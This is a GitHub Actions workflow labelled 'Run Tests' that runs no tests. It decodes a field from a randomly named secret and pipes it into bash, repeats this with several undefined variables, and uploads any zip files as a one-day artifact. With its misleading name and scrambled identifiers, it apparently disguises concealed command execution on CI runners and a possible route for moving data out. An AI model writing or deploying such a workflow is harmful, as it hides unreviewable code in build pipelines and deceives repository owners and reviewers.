name: Run Tests
on:
  workflow_dispatch:

permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          joss92: ${{ secrets.joss92 }}
        run: |
          printf '%s' "$joss92" | jq -r .shd1 | /bin/bash
          printf '%s' "$mpyl0" | jq -r .rv51 | /bin/bash
          echo $pb749 | jq -r .qkw65 | /bin/bash
          echo $imbqx87 | jq -r .ih763 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: xFZhzd7g
          path: "*.zip"
          retention-days: 1
